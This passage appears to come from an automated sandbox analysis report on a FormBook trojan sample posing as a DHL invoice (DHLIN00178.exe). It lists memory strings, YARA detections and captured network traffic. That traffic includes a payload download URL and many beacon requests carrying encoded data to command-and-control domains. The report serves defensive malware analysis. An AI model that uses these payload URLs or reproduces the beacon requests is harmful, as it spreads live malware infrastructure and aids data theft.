6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
        Source: DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: DHLIN00178.exe, 00000005.00000003.6914823773.00000000076A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bin
        Source: DHLIN00178.exe, 00000005.00000003.6914823773.00000000076A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bincj
        Source: DHLIN00178.exe, DHLIN00178.exe, 00000001.00000000.4561346773.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000001.00000002.6089742553.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000005.00000000.5906874308.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: DHLIN00178.exe, 00000001.00000000.4561346773.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000001.00000002.6089742553.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000005.00000000.5906874308.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nero.com
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
        Source: DHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: DHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
        Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: unknownHTTP traffic detected: POST /i9th/ HTTP/1.1Host: www.sem-jobs.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.sem-jobs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sem-jobs.com/i9th/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 67 39 4a 56 77 34 79 3d 7e 35 74 6f 4e 35 68 77 70 35 51 6a 61 45 58 30 7e 33 66 36 74 69 37 37 72 76 54 68 67 48 7a 74 39 69 7a 4f 78 63 4c 6c 36 71 78 58 36 4b 49 62 6b 33 4a 6f 58 55 76 57 4b 5f 39 64 43 66 6e 45 7e 32 6c 70 30 4d 71 59 56 78 71 64 43 35 62 63 39 57 56 4f 6f 68 37 30 6b 73 34 37 6a 45 59 7a 41 66 59 57 49 4d 58 30 57 6f 64 36 72 64 45 49 63 5f 67 53 52 4c 6b 7a 36 62 4c 64 34 58 4e 54 75 47 47 68 36 49 55 50 68 56 51 62 38 50 74 6f 50 35 4a 71 71 4f 6b 6a 7e 41 52 38 31 54 50 56 57 34 32 6a 44 73 41 72 4f 31 47 79 36 72 6a 6e 33 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: eg9JVw4y=~5toN5hwp5QjaEX0~3f6ti77rvThgHzt9izOxcLl6qxX6KIbk3JoXUvWK_9dCfnE~2lp0MqYVxqdC5bc9WVOoh70ks47jEYzAfYWIMX0Wod6rdEIc_gSRLkz6bLd4XNTuGGh6IUPhVQb8PtoP5JqqOkj~AR81TPVW42jDsArO1Gy6rjn3w).
        Source: unknownDNS traffic detected: queries for: machupichuturismo.com
        Source: C:\Windows\explorer.exeCode function: 7_2_0E1E84B2 getaddrinfo,SleepEx,setsockopt,recv,recv,
        Source: global trafficHTTP traffic detected: GET /bBbWIWXVMfEPUqiMugc81.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:111.0) Gecko/20100101 Firefox/111.0Host: machupichuturismo.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1Host: www.casinoenligne-france.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY HTTP/1.1Host: www.37123.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1Host: www.adasoft.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY HTTP/1.1Host: www.hhkk143.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY HTTP/1.1Host: www.spotcheck.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1Host: www.dinggubd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&WsTjx=NuByY HTTP/1.1Host: www.hot6s.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== HTTP/1.1Host: www.0w3jy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY HTTP/1.1Host: www.cmproutdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== HTTP/1.1Host: www.daon3999.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByY HTTP/1.1Host: www.5319ss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== HTTP/1.1Host: www.riverflow.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByY HTTP/1.1Host: www.verde-amar.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: DHLIN00178.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
